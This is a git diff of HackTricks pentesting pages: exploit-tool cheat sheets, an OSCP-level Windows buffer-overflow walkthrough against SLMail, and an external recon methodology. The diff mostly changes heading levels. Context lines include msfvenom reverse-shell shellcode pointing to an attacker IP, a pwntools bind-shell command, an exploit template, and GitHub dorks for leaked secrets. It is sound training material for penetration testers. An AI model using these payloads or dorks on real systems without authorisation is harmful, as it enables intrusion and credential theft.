* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html)
diff --git a/exploiting/tools/README.md b/exploiting/tools/README.md
index 4aa16544..f6d79065 100644
--- a/exploiting/tools/README.md
+++ b/exploiting/tools/README.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Exploiting Tools
-
-## Metasploit
+# Metasploit
```
pattern_create.rb -l 3000 #Length
@@ -29,27 +27,27 @@ nasm> jmp esp #Get opcodes
msfelfscan -j esi /opt/fusion/bin/level01
```
-### Shellcodes
+## Shellcodes
```
msfvenom /p windows/shell_reverse_tcp LHOST= LPORT= [EXITFUNC=thread] [-e x86/shikata_ga_nai] -b "\x00\x0a\x0d" -f c
```
-## GDB
+# GDB
-### Install
+## Install
```
apt-get install gdb
```
-### Parameters
+## Parameters
**-q** --> No show banner\
**-x \** --> Auto-execute GDB instructions from here\
**-p \** --> Attach to process
-#### Instructions
+### Instructions
\> **disassemble main** --> Disassemble the function\
\> **disassemble 0x12345678**\
@@ -92,7 +90,7 @@ apt-get install gdb
* **x/xw \&pointer** --> Address where the pointer is located
* **x/i $eip** —> Instructions of the EIP
-### [GEF](https://github.com/hugsy/gef)
+## [GEF](https://github.com/hugsy/gef)
```bash
checksec #Check protections
@@ -124,9 +122,9 @@ gef➤ pattern search 0x6261617762616176
[+] Found at offset 184 (little-endian search) likely
```
-### Tricks
+## Tricks
-#### GDB same addresses
+### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
@@ -136,7 +134,7 @@ While debugging GDB will have **slightly different addresses than the used by th
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
-#### Backtrace to find functions called
+### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary (and no to external libraries). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.\
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** (**backtrace**) command to see the functions called:
@@ -150,13 +148,13 @@ gef➤ bt
#4 0x0000000000400a5a in ?? ()
```
-### GDB server
+## GDB server
`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine)
-## Ghidra
+# Ghidra
-### Find stack offset
+## Find stack offset
**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\
For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\
@@ -164,7 +162,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
.png>)
-## GCC
+# GCC
**gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\
**-o** --> Output\
@@ -175,7 +173,7 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**nasm -f elf assembly.asm** --> return a ".o"\
**ld assembly.o -o shellcodeout** --> Executable
-## Objdump
+# Objdump
**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\
**-Mintel** --> **Intel** syntax\
@@ -188,13 +186,13 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\
**objdump -D ./exec | grep "VAR\_NAME"** --> Address or a static variable (those are stored in DATA section).
-## Core dumps
+# Core dumps
1. Run `ulimit -c unlimited` before starting my program
2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t`
3. sudo gdb --core=\ --quiet
-## More
+# More
**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\
**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\
@@ -204,16 +202,16 @@ _Remember that the first 0x08 from where the RIP is saved belongs to the RBP._
**strace executable** --> Functions called by the executable\
**rabin2 -i ejecutable -->** Address of all the functions
-## **Inmunity debugger**
+# **Inmunity debugger**
```bash
!mona modules #Get protections, look for all false except last one (Dll of SO)
!mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP)
```
-## IDA
+# IDA
-### Debugging in remote linux
+## Debugging in remote linux
Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary _linux\_server_ or _linux\_server64_ inside the linux server and run it nside the folder that contains the binary:
diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md
index b7ae814e..f0c1bba8 100644
--- a/exploiting/tools/pwntools.md
+++ b/exploiting/tools/pwntools.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# PwnTools
-
```
pip3 install pwntools
```
-## Pwn asm
+# Pwn asm
Get opcodes from line or file.
@@ -39,7 +37,7 @@ pwn asm -i
* avoid bytes (new lines, null, a list)
* select encoder debug shellcode using gdb run the output
-## **Pwn checksec**
+# **Pwn checksec**
Checksec script
@@ -47,9 +45,9 @@ Checksec script
pwn checksec
```
-## Pwn constgrep
+# Pwn constgrep
-## Pwn cyclic
+# Pwn cyclic
Get a pattern
@@ -65,7 +63,7 @@ pwn cyclic -l faad
* context (16,32,64,linux,windows...)
* Take the offset (-l)
-## Pwn debug
+# Pwn debug
Attach GDB to a process
@@ -81,7 +79,7 @@ pwn debug --process bash
* gdbscript to execute
* sysrootpath
-## Pwn disablenx
+# Pwn disablenx
Disable nx of a binary
@@ -89,7 +87,7 @@ Disable nx of a binary
pwn disablenx
```
-## Pwn disasm
+# Pwn disasm
Disas hex opcodes
@@ -103,7 +101,7 @@ pwn disasm ffe4
* base addres
* color(default)/no color
-## Pwn elfdiff
+# Pwn elfdiff
Print differences between 2 fiels
@@ -111,7 +109,7 @@ Print differences between 2 fiels
pwn elfdiff
```
-## Pwn hex
+# Pwn hex
Get hexadecimal representation
@@ -119,7 +117,7 @@ Get hexadecimal representation
pwn hex hola #Get hex of "hola" ascii
```
-## Pwn phd
+# Pwn phd
Get hexdump
@@ -133,11 +131,11 @@ pwn phd
* Number of bytes per line highlight byte
* Skip bytes at beginning
-## Pwn pwnstrip
+# Pwn pwnstrip
-## Pwn scrable
+# Pwn scrable
-## Pwn shellcraft
+# Pwn shellcraft
Get shellcodes
@@ -164,7 +162,7 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
* list possible shellcodes
* Generate ELF as a shared library
-## Pwn template
+# Pwn template
Get a python template
@@ -174,7 +172,7 @@ pwn template
**Can select:** host, port, user, pass, path and quiet
-## Pwn unhex
+# Pwn unhex
From hex to string
@@ -182,7 +180,7 @@ From hex to string
pwn unhex 686f6c61
```
-## Pwn update
+# Pwn update
To update pwntools
diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
index 6898c85b..f0a385f3 100644
--- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Windows Exploiting (Basic Guide - OSCP lvl)
+# **Start installing the SLMail service**
-## **Start installing the SLMail service**
-
-## Restart SLMail service
+# Restart SLMail service
Every time you need to **restart the service SLMail** you can do it using the windows console:
@@ -31,7 +29,7 @@ net start slmail
.png>)
-## Very basic python exploit template
+# Very basic python exploit template
```python
#!/usr/bin/python
@@ -55,11 +53,11 @@ except:
print "Could not connect to "+ip+":"+port
```
-## **Change Immunity Debugger Font**
+# **Change Immunity Debugger Font**
Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
-## **Attach the proces to Immunity Debugger:**
+# **Attach the proces to Immunity Debugger:**
**File --> Attach**
@@ -67,13 +65,13 @@ Go to `Options >> Appearance >> Fonts >> Change(Consolas, Blod, 9) >> OK`
**And press START button**
-## **Send the exploit and check if EIP is affected:**
+# **Send the exploit and check if EIP is affected:**
.png>)
Every time you break the service you should restart it as is indicated in the beginnig of this page.
-## Create a pattern to modify the EIP
+# Create a pattern to modify the EIP
The pattern should be as big as the buffer you used to broke the service previously.
@@ -113,7 +111,7 @@ With this buffer the EIP crashed should point to 42424242 ("BBBB")
Looks like it is working.
-## Check for Shellcode space inside the stack
+# Check for Shellcode space inside the stack
600B should be enough for any powerfull shellcode.
@@ -133,7 +131,7 @@ You can see that when the vulnerability is reached, the EBP is pointing to the s
In this case we have **from 0x0209A128 to 0x0209A2D6 = 430B.** Enough.
-## Check for bad chars
+# Check for bad chars
Change again the buffer:
@@ -173,7 +171,7 @@ In this case you can see that **the char 0x0D is avoided**:
.png>)
-## Find a JMP ESP as a return address
+# Find a JMP ESP as a return address
Using:
@@ -204,7 +202,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
**In this case, for example: **_**0x5f4a358f**_
-## Create shellcode
+# Create shellcode
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d'
@@ -268,7 +266,7 @@ except:
There are shellcodes that will **overwrite themselves**, therefore it's important to always add some NOPs before the shellcode
{% endhint %}
-## Improving the shellcode
+# Improving the shellcode
Add this parameters:
diff --git a/external-recon-methodology.md b/external-recon-methodology.md
index 5d396c6b..ce69bece 100644
--- a/external-recon-methodology.md
+++ b/external-recon-methodology.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# External Recon Methodology
-
{% hint style="danger" %}
Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?
[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
@@ -27,7 +25,7 @@ Do you use **Hacktricks every day**? Did you find the book **very** **useful**?
If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
-## Assets discoveries
+# Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@@ -38,7 +36,7 @@ The goal of this phase is to obtain all the **companies owned by the main compan
3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\).
-### Acquisitions
+## Acquisitions
First of all, we need to know which **other companies are owned by the main company**.
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.
@@ -46,7 +44,7 @@ Other option is to visit the **Wikipedia** page of the main company and search f
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
-### ASNs
+## ASNs
An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**.
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
@@ -64,13 +62,13 @@ amass intel -asn 8911,50313,394161
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\).
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/).
-### Looking for vulnerabilities
+## Looking for vulnerabilities
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts.
Also, you could launch some [**port scans**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**.
Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce** services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
-## Domains
+# Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
@@ -78,7 +76,7 @@ _Please, note that in the following purposed techniques you can also find subdom
First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
-### Reverse DNS
+## Reverse DNS
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\)
@@ -92,7 +90,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
For this to work, the administrator has to enable manually the PTR.
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/)
-### Reverse Whois \(loop\)
+## Reverse Whois \(loop\)
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\).
You can use online tools like:
@@ -110,7 +108,7 @@ You can also perform some automatic reverse whois discovery with [amass](https:/
**Note that you can use this technique to discover more domain names every time you find a new domain.**
-### Trackers
+## Trackers
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
@@ -122,7 +120,7 @@ There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com/)
* [**SpyOnWeb**](http://spyonweb.com/)
-### **Favicon**
+## **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
@@ -135,38 +133,38 @@ python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
-### Other ways
+## Other ways
**Note that you can use this technique to discover more domain names every time you find a new domain.**
-#### Shodan
+### Shodan
As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"`
-#### Google
+### Google
Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages.
-#### Assetfinder
+### Assetfinder
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
-### Looking for vulnerabilities
+## Looking for vulnerabilities
Check for some [domain takeover](pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-## Subdomains
+# Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain.
-### DNS
+## DNS
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\).
@@ -174,7 +172,7 @@ Let's try to get **subdomains** from the **DNS** records. We should also try for
dnsrecon -a -d tesla.com
```
-### OSINT
+## OSINT
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
@@ -192,13 +190,13 @@ assetfinder --subs-only
Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
-#### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
+### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/)
This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
-#### RapidDNS
+### RapidDNS
Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\):
@@ -211,14 +209,14 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
}
```
-#### Shodan
+### Shodan
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
* http.html:”dev-int.bigcompanycdn.com”
* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”)
-### DNS Brute force
+## DNS Brute force
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\).
@@ -247,13 +245,13 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
-### VHosts
+## VHosts
-#### IP VHosts
+### IP VHosts
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
-#### Brute Force
+### Brute Force
If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
@@ -270,7 +268,7 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com
With this technique you may even be able to access internal/hidden endpoints.
{% endhint %}
-### CORS Brute Force
+## CORS Brute Force
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
@@ -278,20 +276,20 @@ Sometimes you will find pages that only return the header _**Access-Control-Allo
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
-### DNS Brute Force v2
+## DNS Brute Force v2
Once you have finished looking for subdomains you can use [**dnsgen** ](https://github.com/ProjectAnte/dnsgen)and [**altdns**](https://github.com/infosec-au/altdns) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
-### Buckets Brute Force
+## Buckets Brute Force
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](pentesting/pentesting-web/buckets/)**.**
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](pentesting/pentesting-web/buckets/).
-### Monitorization
+## Monitorization
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
-### Looking for vulnerabilities
+## Looking for vulnerabilities
Check for possible [**subdomain takeovers**](pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).
If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](pentesting/pentesting-web/buckets/).
@@ -299,7 +297,7 @@ If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions
If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-## Web servers hunting
+# Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
@@ -315,13 +313,13 @@ cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 an
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
```
-### Screenshots
+## Screenshots
Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), \[**Aquatone**\]\(**[https://github.com/michenriksen/aquatone](https://github.com/michenriksen/aquatone)**\)**, **\[**shutter**\]\(**[https://shutter-project.org/downloads/](https://shutter-project.org/downloads/)**\) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
-## Recapitulation 1
+# Recapitulation 1
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\).
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
@@ -336,11 +334,11 @@ So you have already:
Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.**
-## **Bug hunting OSINT related information**
+# **Bug hunting OSINT related information**
Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits.
-### Api keys leaks in github
+## Api keys leaks in github
* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber)
* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit)
@@ -354,7 +352,7 @@ Now that we have built the list of assets of our scope it's time to search for s
**Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._
-#### More Github Dorks
+### More Github Dorks
* extension:pem private
* extension:ppk private
@@ -369,11 +367,11 @@ Now that we have built the list of assets of our scope it's time to search for s
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key)
-## [**Pentesting Web Methodology**](pentesting/pentesting-web/)
+# [**Pentesting Web Methodology**](pentesting/pentesting-web/)
Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/).
-## Recapitulation 2
+# Recapitulation 2
> Congratulations! The testing has finished! I hope you have find some vulnerabilities.
diff --git a/external-recon-methodology/README.md b/external-recon-methodology/README.md
index bb52223b..b3e0b65e 100644
--- a/external-recon-methodology/README.md
+++ b/external-recon-methodology/README.md
@@ -24,7 +24,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
{% embed url="https://go.intigriti.com/hacktricks" %}
{% endhint %}
-## Assets discoveries
+# Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@@ -35,7 +35,7 @@ The goal of this phase is to obtain all the **companies owned by the main compan
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
-### **Acquisitions**
+## **Acquisitions**
First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
@@ -43,7 +43,7 @@ Other option is to visit the **Wikipedia** page of the main company and search f
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
-### **ASNs**
+## **ASNs**
An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
@@ -61,13 +61,13 @@ amass intel -asn 8911,50313,394161
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
-### **Looking for vulnerabilities**
+## **Looking for vulnerabilities**
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
-## Domains
+# Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
@@ -75,7 +75,7 @@ _Please, note that in the following purposed techniques you can also find subdom
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
-### **Reverse DNS**
+## **Reverse DNS**
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
@@ -89,7 +89,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
For this to work, the administrator has to enable manually the PTR.\
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
-### **Reverse Whois (loop)**
+## **Reverse Whois (loop)**
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like:
@@ -107,7 +107,7 @@ You can also perform some automatic reverse whois discovery with [amass](https:/
**Note that you can use this technique to discover more domain names every time you find a new domain.**
-### **Trackers**
+## **Trackers**
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
@@ -119,7 +119,7 @@ There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com)
* [**SpyOnWeb**](http://spyonweb.com)
-### **Favicon**
+## **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
@@ -138,7 +138,7 @@ Moreover, you can also search technologies using the favicon hash as explained i
hodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
```
-### **Other ways**
+## **Other ways**
**Note that you can use this technique to discover more domain names every time you find a new domain.**
@@ -156,20 +156,20 @@ Go to the main page an find something that identifies the company, like the copy
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
-### **Looking for vulnerabilities**
+## **Looking for vulnerabilities**
Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-## Subdomains
+# Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain.
-### **DNS**
+## **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
@@ -177,7 +177,7 @@ Let's try to get **subdomains** from the **DNS** records. We should also try for
dnsrecon -a -d tesla.com
```
-### **OSINT**
+## **OSINT**
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
@@ -202,7 +202,7 @@ This project offers for **free all the subdomains related to bug-bounty programs
